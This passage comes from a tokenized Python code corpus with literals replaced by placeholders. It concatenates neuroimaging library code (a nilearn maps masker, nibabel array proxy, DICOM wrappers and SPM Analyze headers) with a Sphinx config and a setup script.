raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> target_shape = None <EOL> target_affine = None <EOL> if self . resampling_target != '<STR_LIT:data>' : <EOL> target_shape = self . _resampled_maps_img_ . shape [ : <NUM_LIT:3> ] <EOL> target_affine = self . _resampled_maps_img_ . get_affine ( ) <EOL> params = get_params ( NiftiMapsMasker , self , <EOL> ignore = [ '<STR_LIT>' ] ) <EOL> params [ '<STR_LIT>' ] = target_shape <EOL> params [ '<STR_LIT>' ] = target_affine <EOL> region_signals , labels_ = self . _cache ( <EOL> filter_and_extract , ignore = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ( <EOL> imgs , _ExtractionFunctor ( self . _resampled_maps_img_ , <EOL> self . _resampled_mask_img_ ) , <EOL> params , <EOL> confounds = confounds , <EOL> memory = self . memory , <EOL> memory_level = self . memory_level , <EOL> verbose = self . verbose ) <EOL> self . labels_ = labels_ <EOL> return region_signals <EOL> def inverse_transform ( self , region_signals ) : <EOL> """<STR_LIT>""" <EOL> from . . regions import signal_extraction <EOL> self . _check_fitted ( ) <EOL> logger . log ( "<STR_LIT>" , verbose = self . verbose ) <EOL> return signal_extraction . signals_to_img_maps ( <EOL> region_signals , self . maps_img_ , mask_img = self . mask_img_ ) </s>
<s> """<STR_LIT>""" <EOL> from . region_extractor import connected_regions , RegionExtractor <EOL> from . signal_extraction import ( <EOL> img_to_signals_labels , signals_to_img_labels , <EOL> img_to_signals_maps , signals_to_img_maps , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] </s>
<s> import sys <EOL> import os <EOL> execfile ( '<STR_LIT>' ) <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> else : <EOL> html_theme = '<STR_LIT:default>' <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = __version__ <EOL> release = __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> numpydoc_show_class_members = False </s>
<s> from videocore import __version__ <EOL> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> from . volumeutils import array_from_file , apply_read_scaling <EOL> from . fileslice import fileslice <EOL> from . keywordonly import kw_only_meth <EOL> from . openers import ImageOpener <EOL> class ArrayProxy ( object ) : <EOL> """<STR_LIT>""" <EOL> order = '<STR_LIT:F>' <EOL> @ kw_only_meth ( <NUM_LIT:2> ) <EOL> def __init__ ( self , file_like , header , mmap = True ) : <EOL> """<STR_LIT>""" <EOL> if mmap not in ( True , False , '<STR_LIT:c>' , '<STR_LIT:r>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . file_like = file_like <EOL> self . _shape = header . get_data_shape ( ) <EOL> self . _dtype = header . get_data_dtype ( ) <EOL> self . _offset = header . get_data_offset ( ) <EOL> self . _slope , self . _inter = header . get_slope_inter ( ) <EOL> self . _slope = <NUM_LIT:1.0> if self . _slope is None else self . _slope <EOL> self . _inter = <NUM_LIT:0.0> if self . _inter is None else self . _inter <EOL> self . _mmap = mmap <EOL> self . _header = header . copy ( ) <EOL> @ property <EOL> def header ( self ) : <EOL> warnings . warn ( '<STR_LIT>' , <EOL> FutureWarning , <EOL> stacklevel = <NUM_LIT:2> ) <EOL> return self . _header <EOL> @ property <EOL> def shape ( self ) : <EOL> return self . _shape <EOL> @ property <EOL> def is_proxy ( self ) : <EOL> return True <EOL> @ property <EOL> def slope ( self ) : <EOL> return self . _slope <EOL> @ property <EOL> def inter ( self ) : <EOL> return self . _inter <EOL> @ property <EOL> def offset ( self ) : <EOL> return self . _offset <EOL> def get_unscaled ( self ) : <EOL> '''<STR_LIT>''' <EOL> with ImageOpener ( self . file_like ) as fileobj : <EOL> raw_data = array_from_file ( self . _shape , <EOL> self . _dtype , <EOL> fileobj , <EOL> offset = self . _offset , <EOL> order = self . order , <EOL> mmap = self . _mmap ) <EOL> return raw_data <EOL> def __array__ ( self ) : <EOL> raw_data = self . get_unscaled ( ) <EOL> return apply_read_scaling ( raw_data , self . _slope , self . _inter ) <EOL> def __getitem__ ( self , slicer ) : <EOL> with ImageOpener ( self . file_like ) as fileobj : <EOL> raw_data = fileslice ( fileobj , <EOL> slicer , <EOL> self . _shape , <EOL> self . _dtype , <EOL> self . _offset , <EOL> order = self . order ) <EOL> return apply_read_scaling ( raw_data , self . _slope , self . _inter ) <EOL> def is_proxy ( obj ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return obj . is_proxy <EOL> except AttributeError : <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> def read_zt_byte_strings ( fobj , n_strings = <NUM_LIT:1> , bufsize = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> byte_strings = [ ] <EOL> trailing = b'<STR_LIT>' <EOL> while True : <EOL> buf = fobj . read ( bufsize ) <EOL> eof = len ( buf ) < bufsize <EOL> zt_strings = buf . split ( b'<STR_LIT:\x00>' ) <EOL> if len ( zt_strings ) > <NUM_LIT:1> : <EOL> byte_strings += [ trailing + zt_strings [ <NUM_LIT:0> ] ] + zt_strings [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> trailing = zt_strings [ - <NUM_LIT:1> ] <EOL> else : <EOL> trailing += zt_strings [ <NUM_LIT:0> ] <EOL> n_found = len ( byte_strings ) <EOL> if eof or n_found >= n_strings : <EOL> break <EOL> if n_found < n_strings : <EOL> raise ValueError ( '<STR_LIT>' . format ( <EOL> n_strings , n_found ) ) <EOL> n_extra = n_found - n_strings <EOL> leftover_strings = byte_strings [ n_strings : ] + [ trailing ] <EOL> extra_bytes = sum ( len ( bs ) for bs in leftover_strings ) + n_extra <EOL> fobj . seek ( - extra_bytes , <NUM_LIT:1> ) <EOL> return byte_strings [ : n_strings ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import operator <EOL> import numpy as np <EOL> from . import csareader as csar <EOL> from . dwiparams import B2q , nearest_pos_semi_def , q2bg <EOL> from . . openers import ImageOpener <EOL> from . . onetime import setattr_on_read as one_time <EOL> from . . pydicom_compat import pydicom <EOL> class WrapperError ( Exception ) : <EOL> pass <EOL> class WrapperPrecisionError ( WrapperError ) : <EOL> pass <EOL> def wrapper_from_file ( file_like , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> from . . pydicom_compat import read_file <EOL> with ImageOpener ( file_like ) as fobj : <EOL> dcm_data = read_file ( fobj , * args , ** kwargs ) <EOL> return wrapper_from_data ( dcm_data ) <EOL> def wrapper_from_data ( dcm_data ) : <EOL> """<STR_LIT>""" <EOL> sop_class = dcm_data . get ( '<STR_LIT>' ) <EOL> if sop_class == '<STR_LIT>' : <EOL> return MultiframeWrapper ( dcm_data ) <EOL> csa = csar . get_csa_header ( dcm_data ) <EOL> if csa is None : <EOL> return Wrapper ( dcm_data ) <EOL> if csar . is_mosaic ( csa ) : <EOL> return MosaicWrapper ( dcm_data , csa ) <EOL> return SiemensWrapper ( dcm_data , csa ) <EOL> class Wrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> is_csa = False <EOL> is_mosaic = False <EOL> is_multiframe = False <EOL> b_matrix = None <EOL> q_vector = None <EOL> b_value = None <EOL> b_vector = None <EOL> def __init__ ( self , dcm_data ) : <EOL> """<STR_LIT>""" <EOL> self . dcm_data = dcm_data <EOL> @ one_time <EOL> def image_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> shape = ( self . get ( '<STR_LIT>' ) , self . get ( '<STR_LIT>' ) ) <EOL> if None in shape : <EOL> return None <EOL> return shape <EOL> @ one_time <EOL> def image_orient_patient ( self ) : <EOL> """<STR_LIT>""" <EOL> iop = self . get ( '<STR_LIT>' ) <EOL> if iop is None : <EOL> return None <EOL> iop = np . array ( list ( map ( float , iop ) ) ) <EOL> return np . array ( iop ) . reshape ( <NUM_LIT:2> , <NUM_LIT:3> ) . T <EOL> @ one_time <EOL> def slice_normal ( self ) : <EOL> iop = self . image_orient_patient <EOL> if iop is None : <EOL> return None <EOL> return np . cross ( iop [ : , <NUM_LIT:1> ] , iop [ : , <NUM_LIT:0> ] ) <EOL> @ one_time <EOL> def rotation_matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> iop = self . image_orient_patient <EOL> s_norm = self . slice_normal <EOL> if iop is None or s_norm is None : <EOL> return None <EOL> R = np . eye ( <NUM_LIT:3> ) <EOL> R [ : , : <NUM_LIT:2> ] = np . fliplr ( iop ) <EOL> R [ : , <NUM_LIT:2> ] = s_norm <EOL> if not np . allclose ( np . eye ( <NUM_LIT:3> ) , np . dot ( R , R . T ) , atol = <NUM_LIT> ) : <EOL> raise WrapperPrecisionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return R <EOL> @ one_time <EOL> def voxel_sizes ( self ) : <EOL> """<STR_LIT>""" <EOL> pix_space = self . get ( '<STR_LIT>' ) <EOL> if pix_space is None : <EOL> return None <EOL> zs = self . get ( '<STR_LIT>' ) <EOL> if zs is None : <EOL> zs = self . get ( '<STR_LIT>' ) <EOL> if zs is None : <EOL> zs = <NUM_LIT:1> <EOL> zs = float ( zs ) <EOL> pix_space = list ( map ( float , pix_space ) ) <EOL> return tuple ( pix_space + [ zs ] ) <EOL> @ one_time <EOL> def image_position ( self ) : <EOL> """<STR_LIT>""" <EOL> ipp = self . get ( '<STR_LIT>' ) <EOL> if ipp is None : <EOL> return None <EOL> return np . array ( list ( map ( float , ipp ) ) ) <EOL> @ one_time <EOL> def slice_indicator ( self ) : <EOL> """<STR_LIT>""" <EOL> ipp = self . image_position <EOL> s_norm = self . slice_normal <EOL> if ipp is None or s_norm is None : <EOL> return None <EOL> return np . inner ( ipp , s_norm ) <EOL> @ one_time <EOL> def instance_number ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( '<STR_LIT>' ) <EOL> @ one_time <EOL> def series_signature ( self ) : <EOL> """<STR_LIT>""" <EOL> signature = { } <EOL> eq = operator . eq <EOL> for key in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> signature [ key ] = ( self . get ( key ) , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_shape , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_orient_patient , none_or_close ) <EOL> signature [ '<STR_LIT>' ] = ( self . voxel_sizes , none_or_close ) <EOL> return signature <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . dcm_data : <EOL> raise KeyError ( '<STR_LIT>' % key ) <EOL> return self . dcm_data . get ( key ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . dcm_data . get ( key , default ) <EOL> def get_affine ( self ) : <EOL> """<STR_LIT>""" <EOL> orient = self . rotation_matrix <EOL> vox = self . voxel_sizes <EOL> ipp = self . image_position <EOL> if any ( p is None for p in ( orient , vox , ipp ) ) : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> aff = np . eye ( <NUM_LIT:4> ) <EOL> aff [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = orient * np . array ( vox ) <EOL> aff [ : <NUM_LIT:3> , <NUM_LIT:3> ] = ipp <EOL> return aff <EOL> def get_pixel_array ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . dcm_data . get ( '<STR_LIT>' ) <EOL> if data is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> return data <EOL> def get_data ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _scale_data ( self . get_pixel_array ( ) ) <EOL> def is_same_series ( self , other ) : <EOL> """<STR_LIT>""" <EOL> my_sig = self . series_signature <EOL> your_sig = other . series_signature <EOL> my_keys = set ( my_sig ) <EOL> your_keys = set ( your_sig ) <EOL> for key in my_keys . intersection ( your_keys ) : <EOL> v1 , func = my_sig [ key ] <EOL> v2 , _ = your_sig [ key ] <EOL> if not func ( v1 , v2 ) : <EOL> return False <EOL> for keys , sig in ( ( my_keys - your_keys , my_sig ) , <EOL> ( your_keys - my_keys , your_sig ) ) : <EOL> for key in keys : <EOL> v1 , func = sig [ key ] <EOL> if not func ( v1 , None ) : <EOL> return False <EOL> return True <EOL> def _scale_data ( self , data ) : <EOL> scale = float ( self . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> offset = float ( self . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> return self . _apply_scale_offset ( data , scale , offset ) <EOL> def _apply_scale_offset ( self , data , scale , offset ) : <EOL> if scale != <NUM_LIT:1> : <EOL> if offset == <NUM_LIT:0> : <EOL> return data * scale <EOL> return data * scale + offset <EOL> if offset != <NUM_LIT:0> : <EOL> return data + offset <EOL> return data <EOL> @ one_time <EOL> def b_value ( self ) : <EOL> """<STR_LIT>""" <EOL> q_vec = self . q_vector <EOL> if q_vec is None : <EOL> return None <EOL> return q2bg ( q_vec ) [ <NUM_LIT:0> ] <EOL> @ one_time <EOL> def b_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> q_vec = self . q_vector <EOL> if q_vec is None : <EOL> return None <EOL> return q2bg ( q_vec ) [ <NUM_LIT:1> ] <EOL> class MultiframeWrapper ( Wrapper ) : <EOL> """<STR_LIT>""" <EOL> is_multiframe = True <EOL> def __init__ ( self , dcm_data ) : <EOL> """<STR_LIT>""" <EOL> Wrapper . __init__ ( self , dcm_data ) <EOL> self . dcm_data = dcm_data <EOL> self . frames = dcm_data . get ( '<STR_LIT>' ) <EOL> try : <EOL> self . frames [ <NUM_LIT:0> ] <EOL> except TypeError : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> try : <EOL> self . shared = dcm_data . get ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> except TypeError : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> self . _shape = None <EOL> @ one_time <EOL> def image_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> rows , cols = self . get ( '<STR_LIT>' ) , self . get ( '<STR_LIT>' ) <EOL> if None in ( rows , cols ) : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> n_frames = self . get ( '<STR_LIT>' ) <EOL> assert len ( self . frames ) == n_frames <EOL> frame_indices = np . array ( <EOL> [ frame . FrameContentSequence [ <NUM_LIT:0> ] . DimensionIndexValues <EOL> for frame in self . frames ] ) <EOL> stack_ids = set ( frame . FrameContentSequence [ <NUM_LIT:0> ] . StackID <EOL> for frame in self . frames ) <EOL> if len ( stack_ids ) > <NUM_LIT:1> : <EOL> raise WrapperError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> dim_seq = [ dim . DimensionIndexPointer <EOL> for dim in self . get ( '<STR_LIT>' ) ] <EOL> stackid_tag = pydicom . datadict . tag_for_name ( '<STR_LIT>' ) <EOL> if stackid_tag in dim_seq : <EOL> stackid_dim_idx = dim_seq . index ( stackid_tag ) <EOL> frame_indices = np . delete ( frame_indices , stackid_dim_idx , axis = <NUM_LIT:1> ) <EOL> n_dim = frame_indices . shape [ <NUM_LIT:1> ] + <NUM_LIT:2> <EOL> self . _frame_indices = frame_indices <EOL> if n_dim < <NUM_LIT:4> : <EOL> return rows , cols , n_frames <EOL> ns_unique = [ len ( np . unique ( row ) ) for row in self . _frame_indices . T ] <EOL> shape = ( rows , cols ) + tuple ( ns_unique ) <EOL> n_vols = np . prod ( shape [ <NUM_LIT:3> : ] ) <EOL> if n_frames != n_vols * shape [ <NUM_LIT:2> ] : <EOL> raise WrapperError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return tuple ( shape ) <EOL> @ one_time <EOL> def image_orient_patient ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> iop = self . shared . PlaneOrientationSequence [ <NUM_LIT:0> ] . ImageOrientationPatient <EOL> except AttributeError : <EOL> try : <EOL> iop = self . frames [ <NUM_LIT:0> ] . PlaneOrientationSequence [ <NUM_LIT:0> ] . ImageOrientationPatient <EOL> except AttributeError : <EOL> raise WrapperError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if iop is None : <EOL> return None <EOL> iop = np . array ( list ( map ( float , iop ) ) ) <EOL> return np . array ( iop ) . reshape ( <NUM_LIT:2> , <NUM_LIT:3> ) . T <EOL> @ one_time <EOL> def voxel_sizes ( self ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> pix_measures = self . shared . PixelMeasuresSequence [ <NUM_LIT:0> ] <EOL> except AttributeError : <EOL> try : <EOL> pix_measures = self . frames [ <NUM_LIT:0> ] . PixelMeasuresSequence [ <NUM_LIT:0> ] <EOL> except AttributeError : <EOL> raise WrapperError ( "<STR_LIT>" ) <EOL> pix_space = pix_measures . PixelSpacing <EOL> try : <EOL> zs = pix_measures . SliceThickness <EOL> except AttributeError : <EOL> zs = self . get ( '<STR_LIT>' ) <EOL> if zs is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> return tuple ( map ( float , list ( pix_space ) + [ zs ] ) ) <EOL> @ one_time <EOL> def image_position ( self ) : <EOL> try : <EOL> ipp = self . shared . PlanePositionSequence [ <NUM_LIT:0> ] . ImagePositionPatient <EOL> except AttributeError : <EOL> try : <EOL> ipp = self . frames [ <NUM_LIT:0> ] . PlanePositionSequence [ <NUM_LIT:0> ] . ImagePositionPatient <EOL> except AttributeError : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> if ipp is None : <EOL> return None <EOL> return np . array ( list ( map ( float , ipp ) ) ) <EOL> @ one_time <EOL> def series_signature ( self ) : <EOL> signature = { } <EOL> eq = operator . eq <EOL> for key in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> signature [ key ] = ( self . get ( key ) , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_shape , eq ) <EOL> signature [ '<STR_LIT>' ] = ( self . image_orient_patient , none_or_close ) <EOL> signature [ '<STR_LIT>' ] = ( self . voxel_sizes , none_or_close ) <EOL> return signature <EOL> def get_data ( self ) : <EOL> shape = self . image_shape <EOL> if shape is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> data = self . get_pixel_array ( ) <EOL> data = data . transpose ( ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> sorted_indices = np . lexsort ( self . _frame_indices . T ) <EOL> data = data [ ... , sorted_indices ] <EOL> data = data . reshape ( shape , order = '<STR_LIT:F>' ) <EOL> return self . _scale_data ( data ) <EOL> def _scale_data ( self , data ) : <EOL> pix_trans = getattr ( <EOL> self . frames [ <NUM_LIT:0> ] , '<STR_LIT>' , None ) <EOL> if pix_trans is None : <EOL> return super ( MultiframeWrapper , self ) . _scale_data ( data ) <EOL> scale = float ( pix_trans [ <NUM_LIT:0> ] . RescaleSlope ) <EOL> offset = float ( pix_trans [ <NUM_LIT:0> ] . RescaleIntercept ) <EOL> return self . _apply_scale_offset ( data , scale , offset ) <EOL> class SiemensWrapper ( Wrapper ) : <EOL> """<STR_LIT>""" <EOL> is_csa = True <EOL> def __init__ ( self , dcm_data , csa_header = None ) : <EOL> """<STR_LIT>""" <EOL> super ( SiemensWrapper , self ) . __init__ ( dcm_data ) <EOL> if dcm_data is None : <EOL> dcm_data = { } <EOL> self . dcm_data = dcm_data <EOL> if csa_header is None : <EOL> csa_header = csar . get_csa_header ( dcm_data ) <EOL> if csa_header is None : <EOL> csa_header = { } <EOL> self . csa_header = csa_header <EOL> @ one_time <EOL> def slice_normal ( self ) : <EOL> std_slice_normal = super ( SiemensWrapper , self ) . slice_normal <EOL> csa_slice_normal = csar . get_slice_normal ( self . csa_header ) <EOL> if std_slice_normal is None and csa_slice_normal is None : <EOL> return None <EOL> elif std_slice_normal is None : <EOL> return np . array ( csa_slice_normal ) <EOL> elif csa_slice_normal is None : <EOL> return std_slice_normal <EOL> else : <EOL> dot_prod = np . dot ( csa_slice_normal , std_slice_normal ) <EOL> assert np . allclose ( np . fabs ( dot_prod ) , <NUM_LIT:1.0> , atol = <NUM_LIT> ) <EOL> if dot_prod < <NUM_LIT:0> : <EOL> return - std_slice_normal <EOL> else : <EOL> return std_slice_normal <EOL> @ one_time <EOL> def series_signature ( self ) : <EOL> """<STR_LIT>""" <EOL> signature = super ( SiemensWrapper , self ) . series_signature <EOL> ice = csar . get_ice_dims ( self . csa_header ) <EOL> if ice is not None : <EOL> ice = ice [ : <NUM_LIT:6> ] + ice [ <NUM_LIT:8> : <NUM_LIT:9> ] <EOL> signature [ '<STR_LIT>' ] = ( ice , lambda x , y : x == y ) <EOL> return signature <EOL> @ one_time <EOL> def b_matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> hdr = self . csa_header <EOL> B = csar . get_b_matrix ( hdr ) <EOL> if B is None : <EOL> bval_requested = csar . get_b_value ( hdr ) <EOL> if bval_requested is None : <EOL> return None <EOL> if bval_requested != <NUM_LIT:0> : <EOL> raise csar . CSAError ( '<STR_LIT>' ) <EOL> return np . zeros ( ( <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> R = self . rotation_matrix . T <EOL> B_vox = np . dot ( R , np . dot ( B , R . T ) ) <EOL> return nearest_pos_semi_def ( B_vox ) <EOL> @ one_time <EOL> def q_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> B = self . b_matrix <EOL> if B is None : <EOL> return None <EOL> return B2q ( B , tol = <NUM_LIT> ) <EOL> class MosaicWrapper ( SiemensWrapper ) : <EOL> """<STR_LIT>""" <EOL> is_mosaic = True <EOL> def __init__ ( self , dcm_data , csa_header = None , n_mosaic = None ) : <EOL> """<STR_LIT>""" <EOL> SiemensWrapper . __init__ ( self , dcm_data , csa_header ) <EOL> if n_mosaic is None : <EOL> try : <EOL> n_mosaic = csar . get_n_mosaic ( self . csa_header ) <EOL> except KeyError : <EOL> pass <EOL> if n_mosaic is None or n_mosaic == <NUM_LIT:0> : <EOL> raise WrapperError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . n_mosaic = n_mosaic <EOL> self . mosaic_size = int ( np . ceil ( np . sqrt ( n_mosaic ) ) ) <EOL> @ one_time <EOL> def image_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> rows = self . get ( '<STR_LIT>' ) <EOL> cols = self . get ( '<STR_LIT>' ) <EOL> if None in ( rows , cols ) : <EOL> return None <EOL> mosaic_size = self . mosaic_size <EOL> return ( int ( rows / mosaic_size ) , <EOL> int ( cols / mosaic_size ) , <EOL> self . n_mosaic ) <EOL> @ one_time <EOL> def image_position ( self ) : <EOL> """<STR_LIT>""" <EOL> ipp = super ( MosaicWrapper , self ) . image_position <EOL> md_rows , md_cols = ( self . get ( '<STR_LIT>' ) , self . get ( '<STR_LIT>' ) ) <EOL> iop = self . image_orient_patient <EOL> pix_spacing = self . get ( '<STR_LIT>' ) <EOL> if any ( x is None for x in ( ipp , md_rows , md_cols , iop , pix_spacing ) ) : <EOL> return None <EOL> pix_spacing = np . array ( list ( map ( float , pix_spacing ) ) ) <EOL> md_rc = np . array ( [ md_rows , md_cols ] ) <EOL> rd_rc = md_rc / self . mosaic_size <EOL> vox_trans_fixes = ( md_rc - rd_rc ) / <NUM_LIT:2> <EOL> Q = np . fliplr ( iop ) * pix_spacing <EOL> return ipp + np . dot ( Q , vox_trans_fixes [ : , None ] ) . ravel ( ) <EOL> def get_data ( self ) : <EOL> """<STR_LIT>""" <EOL> shape = self . image_shape <EOL> if shape is None : <EOL> raise WrapperError ( '<STR_LIT>' ) <EOL> n_slice_rows , n_slice_cols , n_mosaic = shape <EOL> n_slab_rows = self . mosaic_size <EOL> n_blocks = n_slab_rows ** <NUM_LIT:2> <EOL> data = self . get_pixel_array ( ) <EOL> v4 = data . reshape ( n_slab_rows , n_slice_rows , <EOL> n_slab_rows , n_slice_cols ) <EOL> v4 = v4 . transpose ( ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> v3 = v4 . reshape ( ( n_slice_rows , n_slice_cols , n_blocks ) ) <EOL> v3 = v3 [ ... , : n_mosaic ] <EOL> return self . _scale_data ( v3 ) <EOL> def none_or_close ( val1 , val2 , rtol = <NUM_LIT> , atol = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> if val1 is None and val2 is None : <EOL> return True <EOL> if val1 is None or val2 is None : <EOL> return False <EOL> return np . allclose ( val1 , val2 , rtol , atol ) </s>
<s> '''<STR_LIT>''' <EOL> import warnings <EOL> import numpy as np <EOL> from . externals . six import BytesIO <EOL> from . spatialimages import HeaderDataError , HeaderTypeError <EOL> from . batteryrunners import Report <EOL> from . import analyze <EOL> from . keywordonly import kw_only_meth <EOL> from . optpkg import optional_package <EOL> have_scipy = optional_package ( '<STR_LIT>' ) [ <NUM_LIT:1> ] <EOL> '''<STR_LIT>''' <EOL> header_key_dtd = analyze . header_key_dtd <EOL> image_dimension_dtd = analyze . image_dimension_dtd [ : ] <EOL> image_dimension_dtd [ <EOL> image_dimension_dtd . index ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ] = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data_history_dtd = analyze . data_history_dtd [ : ] <EOL> data_history_dtd [ <EOL> data_history_dtd . index ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> ] = ( '<STR_LIT>' , '<STR_LIT>' , ( <NUM_LIT:5> , ) ) <EOL> header_dtype = np . dtype ( header_key_dtd + <EOL> image_dimension_dtd + <EOL> data_history_dtd ) <EOL> class SpmAnalyzeHeader ( analyze . AnalyzeHeader ) : <EOL> '''<STR_LIT>''' <EOL> template_dtype = header_dtype <EOL> has_data_slope = True <EOL> has_data_intercept = False <EOL> @ classmethod <EOL> def default_structarr ( klass , endianness = None ) : <EOL> '''<STR_LIT>''' <EOL> hdr_data = super ( SpmAnalyzeHeader , klass ) . default_structarr ( endianness ) <EOL> hdr_data [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> return hdr_data <EOL> def get_slope_inter ( self ) : <EOL> '''<STR_LIT>''' <EOL> slope = self . _structarr [ '<STR_LIT>' ] <EOL> if np . isnan ( slope ) or slope in ( <NUM_LIT:0> , - np . inf , np . inf ) : <EOL> return None , None <EOL> return slope , None <EOL> def set_slope_inter ( self , slope , inter = None ) : <EOL> '''<STR_LIT>''' <EOL> if slope is None : <EOL> slope = np . nan <EOL> if slope in ( <NUM_LIT:0> , - np . inf , np . inf ) : <EOL> raise HeaderDataError ( '<STR_LIT>' ) <EOL> self . _structarr [ '<STR_LIT>' ] = slope <EOL> if inter in ( None , <NUM_LIT:0> ) or np . isnan ( inter ) : <EOL> return <EOL> raise HeaderTypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class Spm99AnalyzeHeader ( SpmAnalyzeHeader ) : <EOL> '''<STR_LIT>''' <EOL> def get_origin_affine ( self ) : <EOL> '''<STR_LIT>''' <EOL> hdr = self . _structarr <EOL> zooms = hdr [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:4> ] . copy ( ) <EOL> if self . default_x_flip : <EOL> zooms [ <NUM_LIT:0> ] *= - <NUM_LIT:1> <EOL> origin = hdr [ '<STR_LIT>' ] [ : <NUM_LIT:3> ] <EOL> dims = hdr [ '<STR_LIT>' ] [ <NUM_LIT:1> : <NUM_LIT:4> ] <EOL> if ( np . any ( origin ) and <EOL> np . all ( origin > - dims ) and np . all ( origin < dims * <NUM_LIT:2> ) ) : <EOL> origin = origin - <NUM_LIT:1> <EOL> else : <EOL> origin = ( dims - <NUM_LIT:1> ) / <NUM_LIT> <EOL> aff = np . eye ( <NUM_LIT:4> ) <EOL> aff [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = np . diag ( zooms ) <EOL> aff [ : <NUM_LIT:3> , - <NUM_LIT:1> ] = - origin * zooms <EOL> return aff <EOL> get_best_affine = get_origin_affine <EOL> def set_origin_from_affine ( self , affine ) : <EOL> 